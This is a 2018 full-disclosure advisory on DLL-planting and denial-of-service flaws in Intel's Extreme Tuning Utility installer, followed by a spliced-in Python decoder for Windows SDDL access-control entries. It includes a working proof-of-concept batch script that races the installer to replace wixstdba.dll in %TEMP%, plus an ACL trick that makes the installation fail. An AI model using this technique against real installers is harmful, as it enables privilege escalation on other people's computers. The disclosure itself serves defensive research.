Message-ID: <778DC9E75C6E40CC90DC1031E0BA90B5@W340>
Date: Wed, 26 Sep 2018 20:31:29 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] Executable installers are vulnerable^WEVIL (case 57): arbitrary code execution WITH escalation of privilege via Intel Extreme Tuning Utility
Hi @ll,
the executable installer of the Intel Extreme Tuning Utility,
version 6.4.1.23 (Latest), released 5/18/2018, available from
<https://downloadmirror.intel.com/24075/eng/XTU-Setup.exe> via
<https://downloadcenter.intel.com/download/24075/Intel-Extreme-Tuning-Utility-Intel-XTU->
is (SURPRISE!) vulnerable.
CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Vulnerability #0:
=================
The executable installer XTU-Setup.exe comes with at least two
OUTDATED and UNSUPPORTED runtime components from Microsoft, one
of which has known and long fixed vulnerabilities!
Component #1:
~~~~~~~~~~~~~
Microsoft SQL Server Compact 3.5 SP2 ENU
This is end-of-life since 4/10/2018; see
<https://support.microsoft.com/en-us/lifecycle/search?alpha=Microsoft+SQL+Server+Compact+3.5>
Component #2:
~~~~~~~~~~~~~
Microsoft Visual C++ 2005 Runtime 8.0.50727.762
Visual C++ 2005 is end-of-life since 4/12/2016, more than TWO
years ago; see
<https://support.microsoft.com/en-us/lifecycle/search?alpha=Microsoft+Visual+C%2B%2B+2005>
The latest Visual C++ 2005 Runtime is version 8.0.50727.4940,
published 4/12/2011, updated 6/14/2011, i.e. SEVEN+ years ago.
See <https://support.microsoft.com/en-us/help/2467175>
and <https://support.microsoft.com/en-us/help/2538242/ms11-025-description-of-the-security-update-for-visual-c-2005-sp1-redi>
Also see
<https://support.microsoft.com/en-us/help/2977003/the-latest-supported-visual-c-downloads>
<https://support.microsoft.com/en-us/help/2661358/minimum-service-pack-levels-for-microsoft-vc-redistributable-packages>
The icing on the cake: XTU-Setup.exe tries to install the OUTDATED
and VULNERABLE Microsoft Visual C++ 2005 Runtime 8.0.50727.762 even
if a newer version is already installed!
That's a pretty good example of AWFULLY BAD software engineering!
Vulnerability #1:
=================
The vcredist_x86.exe package included in XTU-Setup.exe and executed
by it was built with WiX toolset 3.6.
See <http://seclists.org/bugtraq/2016/Jan/105>
and <https://www.firegiant.com/blog/2016/1/20/wix-v3.10.2-released/>
I recommend exercising ENHANCED INTERROGATIONS with Microsoft about
their SLOPPY attitude to software security: the fixes were released
about 2.5 years ago, in cooperation with Microsoft, FireGiant and me,
but Microsoft failed or was too lazy to update their installer packages.
Demonstrations/proof of concepts:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
These are for STANDARD installations of Windows, i.e. where the
user account created during Windows setup is used.
This precondition is met on typical installations of Windows:
according to Microsoft's own security intelligence reports, about
1/2 to 3/4 of the about 600 million Windows installations which
send telemetry data have only ONE active user account.
See <https://www.microsoft.com/security/sir>
A) for the arbitrary code execution with elevation of privilege
---------------------------------------------------------------
1. follow the instructions from
<https://skanthak.homepage.t-online.de/minesweeper.html>
and build the non-forwarding DLLDUMMY.DLL in your %TEMP%
directory;
2. create the following batch script:
--- wixstdba.cmd ---
:WIXSTDBA
@if not exist "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll" goto :WIXSTDBA
copy "%TEMP%\dlldummy.dll" "%temp%\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\.ba1\wixstdba.dll"
--- EOF ---
3. run the batch script per double click;
4. run XTU-Setup.exe: notice the message boxes displayed from the
WIXSTDBA.DLL copied into the subdirectory of %TEMP%.
B) for the denial of service
----------------------------
1. add the NTFS access control list entry (D;OIIO;WP;;;WD) meaning
"deny execution of files in this directory for everyone,
inheritable to all subdirectories" to the (user's) %TEMP%
directory.
NOTE: this does NOT need administrative privileges!
2. execute XTU-Setup.exe: notice the message box displaying the
failure of the installation about 3/4 way through.
STAY FAR AWAY FROM INTEL'S VULNERABLE CRAPWARE!
stay tuned
Stefan Kanthak
Timeline
~~~~~~~~
2017-09-04 vulnerability report sent to Intel
no answer, not even an acknowledgement of receipt
2018-03-22 vulnerability report resent to Intel
2018-05-18 updated installers published by Intel, but no security
advisory
2018-06-05 vulnerability report for the updated but still vulnerable
installers sent to Intel
2018-09-11 security advisory published by Intel:
<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00162.html>
2018-09-26 own security advisory published
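The ACL entry from step B.1 above, (D;OIIO;WP;;;WD), is written in Windows SDDL notation. The following decoder is an added example, not part of Kanthak's advisory or of any Microsoft or Intel code: it parses such an ACE string (and a whole DACL string) into its fields so that an administrator can verify what an entry denies, and to whom, before applying it to a directory. The abbreviation tables cover only the subset of SDDL tokens needed here; the mapping of "WP" to 0x20 (FILE_EXECUTE on files, FILE_TRAVERSE on directories) is the standard one from sddl.h.

```python
# Added example: decode SDDL ACE strings such as "(D;OIIO;WP;;;WD)" so the
# effect of a deny-execute entry on %TEMP% can be reviewed before it is set.
import re

ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT"}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT", "OI": "OBJECT_INHERIT",
             "NP": "NO_PROPAGATE_INHERIT", "IO": "INHERIT_ONLY", "ID": "INHERITED"}
# SDDL right tokens and their bit values; 0x20 is FILE_EXECUTE on files and
# FILE_TRAVERSE on directories, which is why "WP" denies execution here.
RIGHTS = {"WP": 0x20, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
          "GA": 0x10000000, "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116,
          "FX": 0x1200A0}
TRUSTEES = {"WD": "S-1-1-0 (Everyone)", "BA": "S-1-5-32-544 (Administrators)",
            "SY": "S-1-5-18 (SYSTEM)", "AU": "S-1-5-11 (Authenticated Users)"}

ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

def parse_ace(ace):
    """Parse one SDDL ACE string into a dict of decoded fields."""
    m = ACE_RE.fullmatch(ace.strip())
    if not m:
        raise ValueError("not an SDDL ACE: %r" % ace)
    ace_type, flags, rights, _obj, _inh_obj, sid = m.groups()
    # Flag and right tokens are two characters each; rights may also be a hex mask.
    flag_tokens = [flags[i:i + 2] for i in range(0, len(flags), 2)]
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
    else:
        mask = 0
        for tok in (rights[i:i + 2] for i in range(0, len(rights), 2)):
            if tok not in RIGHTS:
                raise ValueError("unknown right token %r" % tok)
            mask |= RIGHTS[tok]
    return {"type": ACE_TYPES.get(ace_type, ace_type),
            "flags": [ACE_FLAGS.get(f, f) for f in flag_tokens],
            "mask": mask,
            "trustee": TRUSTEES.get(sid, sid)}  # literal SIDs pass through

def is_deny_execute_for_everyone(ace):
    """True if the ACE denies FILE_EXECUTE (0x20) to Everyone (S-1-1-0)."""
    d = parse_ace(ace)
    return (d["type"] == "ACCESS_DENIED" and (d["mask"] & 0x20) != 0
            and d["trustee"].startswith("S-1-1-0"))

def parse_dacl(sddl):
    """Split a DACL string such as 'D:PAI(A;;FA;;;SY)(D;OIIO;WP;;;WD)' into ACEs."""
    body = re.sub(r"^D:[A-Z]*", "", sddl.strip())
    return [parse_ace(a) for a in re.findall(r"\([^)]*\)", body)]
```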
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/